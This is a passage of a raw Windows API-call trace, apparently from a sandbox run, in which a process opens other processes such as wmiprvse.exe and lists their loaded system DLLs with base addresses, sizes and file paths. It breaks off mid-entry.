[0046.232] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WMsgAPI.dll") returned 0xb [0046.240] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WMsgAPI.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")) returned 0x1f [0046.247] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7540000, lpmodinfo=0x24f7668, cb=0x18 | out: lpmodinfo=0x24f7668*(lpBaseOfDll=0x7fef7540000, SizeOfImage=0x15000, EntryPoint=0x7fef7541020)) returned 1 [0046.254] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7540000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="appinfo.dll") returned 0xb [0046.261] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7540000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")) returned 0x1f [0046.269] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6d40000, lpmodinfo=0x24f9828, cb=0x18 | out: lpmodinfo=0x24f9828*(lpBaseOfDll=0x7fef6d40000, SizeOfImage=0x1d000, EntryPoint=0x7fef6d42f18)) returned 1 [0046.276] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6d40000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mmcss.dll") returned 0x9 [0046.284] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6d40000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")) returned 0x1d [0046.292] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb710000, lpmodinfo=0x24fb9e8, cb=0x18 | out: lpmodinfo=0x24fb9e8*(lpBaseOfDll=0x7fefb710000, SizeOfImage=0x9000, EntryPoint=0x7fefb711010)) returned 1 [0046.300] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="AVRT.dll") returned 0x8 [0046.308] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AVRT.dll" (normalized: "c:\\windows\\system32\\avrt.dll")) returned 0x1c [0046.316] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x218 [0046.316] EnumProcessModules (in: hProcess=0x218, lphModule=0x2501190, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2501190, lpcbNeeded=0x41eb20) returned 1 [0046.318] GetModuleInformation (in: hProcess=0x218, hModule=0x13f7d0000, lpmodinfo=0x2501400, cb=0x18 | out: lpmodinfo=0x2501400*(lpBaseOfDll=0x13f7d0000, SizeOfImage=0x6c000, EntryPoint=0x13f80b450)) returned 1 [0046.318] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x13f7d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wmiprvse.exe") returned 0xc [0046.319] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x13f7d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiprvse.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")) returned 0x25 [0046.319] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2503610, cb=0x18 | out: lpmodinfo=0x2503610*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0046.319] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0046.320] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0046.320] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x25057d0, cb=0x18 | out: lpmodinfo=0x25057d0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0046.320] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0046.321] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0046.321] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25079a0, cb=0x18 | out: lpmodinfo=0x25079a0*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0046.321] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0046.322] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0046.322] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x2509b70, cb=0x18 | out: lpmodinfo=0x2509b70*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0046.323] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0046.323] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0046.323] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x250bd88, cb=0x18 | out: lpmodinfo=0x250bd88*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0046.324] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0046.324] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0046.325] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x250df48, cb=0x18 | out: lpmodinfo=0x250df48*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0046.325] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0046.326] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0046.327] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x25100f8, cb=0x18 | out: lpmodinfo=0x25100f8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0046.327] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0046.328] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0046.328] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x25122b8, cb=0x18 | out: lpmodinfo=0x25122b8*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0046.329] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0046.330] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0046.330] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x2514510, cb=0x18 | out: lpmodinfo=0x2514510*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0046.331] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0046.332] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0046.332] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x25166e0, cb=0x18 | out: lpmodinfo=0x25166e0*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0046.333] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0046.334] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0046.337] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x25188a0, cb=0x18 | out: lpmodinfo=0x25188a0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0046.337] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0046.338] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0046.339] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x251aa60, cb=0x18 | out: lpmodinfo=0x251aa60*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0046.340] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0046.341] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0046.341] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x251cc30, cb=0x18 | out: lpmodinfo=0x251cc30*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0046.342] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0046.343] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0046.344] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9bc0000, lpmodinfo=0x251edf0, cb=0x18 | out: lpmodinfo=0x251edf0*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0046.345] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="FastProx.dll") returned 0xc [0046.346] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\FastProx.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0046.347] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9e20000, lpmodinfo=0x2520fc8, cb=0x18 | out: lpmodinfo=0x2520fc8*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0046.348] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9e20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0046.349] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9e20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0046.350] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1e0000, lpmodinfo=0x2523198, cb=0x18 | out: lpmodinfo=0x2523198*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0046.351] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0046.352] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0046.353] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x2525488, cb=0x18 | out: lpmodinfo=0x2525488*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0046.354] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0046.355] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0046.356] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x2527648, cb=0x18 | out: lpmodinfo=0x2527648*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0046.357] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0046.358] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0046.360] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b90000, lpmodinfo=0x25297f8, cb=0x18 | out: lpmodinfo=0x25297f8*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0046.361] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0046.362] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0046.363] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef95c0000, lpmodinfo=0x252b9b8, cb=0x18 | out: lpmodinfo=0x252b9b8*(lpBaseOfDll=0x7fef95c0000, SizeOfImage=0x12000, EntryPoint=0x7fef95c89d0)) returned 1 [0046.364] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef95c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NCObjAPI.DLL") returned 0xc [0046.365] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef95c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NCObjAPI.DLL" (normalized: "c:\\windows\\system32\\ncobjapi.dll")) returned 0x20 [0046.367] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x252db88, cb=0x18 | out: lpmodinfo=0x252db88*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0046.368] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0046.369] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0046.370] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x252fd48, cb=0x18 | out: lpmodinfo=0x252fd48*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0046.372] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0046.373] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0046.374] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x2531f08, cb=0x18 | out: lpmodinfo=0x2531f08*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0046.376] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0046.377] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0046.378] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x25340d8, cb=0x18 | out: lpmodinfo=0x25340d8*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0046.380] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0046.383] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0046.384] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x2536298, cb=0x18 | out: lpmodinfo=0x2536298*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0046.385] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0046.387] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0046.388] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x2538458, cb=0x18 | out: lpmodinfo=0x2538458*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0046.390] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0046.391] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0046.393] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b80000, lpmodinfo=0x253a618, cb=0x18 | out: lpmodinfo=0x253a618*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0046.394] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0046.396] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0046.397] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x253c7f0, cb=0x18 | out: lpmodinfo=0x253c7f0*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0046.399] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0046.401] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0046.402] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x253e9b0, cb=0x18 | out: lpmodinfo=0x253e9b0*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0046.404] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0046.406] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0046.407] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2540b70, cb=0x18 | out: lpmodinfo=0x2540b70*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0046.409] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0046.411] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0046.412] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef98a0000, lpmodinfo=0x2542d40, cb=0x18 | out: lpmodinfo=0x2542d40*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0046.414] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef98a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0046.416] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef98a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0046.418] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9780000, lpmodinfo=0x2544f10, cb=0x18 | out: lpmodinfo=0x2544f10*(lpBaseOfDll=0x7fef9780000, SizeOfImage=0x21000, EntryPoint=0x7fef97903b0)) returned 1 [0046.420] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9780000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wmiutils.dll") returned 0xc [0046.421] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9780000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")) returned 0x25 [0046.423] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6df0000, lpmodinfo=0x2547318, cb=0x18 | out: lpmodinfo=0x2547318*(lpBaseOfDll=0x7fef6df0000, SizeOfImage=0x3c000, EntryPoint=0x7fef6e15aa8)) returned 1 [0046.425] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6df0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wmiprov.dll") returned 0xb [0046.427] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6df0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll")) returned 0x24 [0046.429] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6d60000, lpmodinfo=0x25494e8, cb=0x18 | out: lpmodinfo=0x25494e8*(lpBaseOfDll=0x7fef6d60000, SizeOfImage=0x86000, EntryPoint=0x7fef6d6ffd0)) returned 1 [0046.431] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6d60000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemcomn.dll") returned 0xc [0046.433] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6d60000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")) returned 0x20 [0046.435] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef2930000, lpmodinfo=0x254b6b8, cb=0x18 | out: lpmodinfo=0x254b6b8*(lpBaseOfDll=0x7fef2930000, SizeOfImage=0x25000, EntryPoint=0x7fef2948d6c)) returned 1 [0046.436] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef2930000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WmiPerfClass.dll") returned 0x10 [0046.438] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef2930000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll")) returned 0x29 [0046.440] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef28e0000, lpmodinfo=0x254d8a0, cb=0x18 | out: lpmodinfo=0x254d8a0*(lpBaseOfDll=0x7fef28e0000, SizeOfImage=0x4e000, EntryPoint=0x7fef28e1198)) returned 1 [0046.442] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef28e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="pdh.dll") returned 0x7 [0046.445] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef28e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll")) returned 0x1b [0046.447] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd2a0000, lpmodinfo=0x254fa50, cb=0x18 | out: lpmodinfo=0x254fa50*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0046.449] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0046.451] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0046.453] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x218 [0046.453] EnumProcessModules (in: hProcess=0x218, lphModule=0x2552c50, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2552c50, lpcbNeeded=0x41eb20) returned 1 [0046.454] GetModuleInformation (in: hProcess=0x218, hModule=0xe20000, 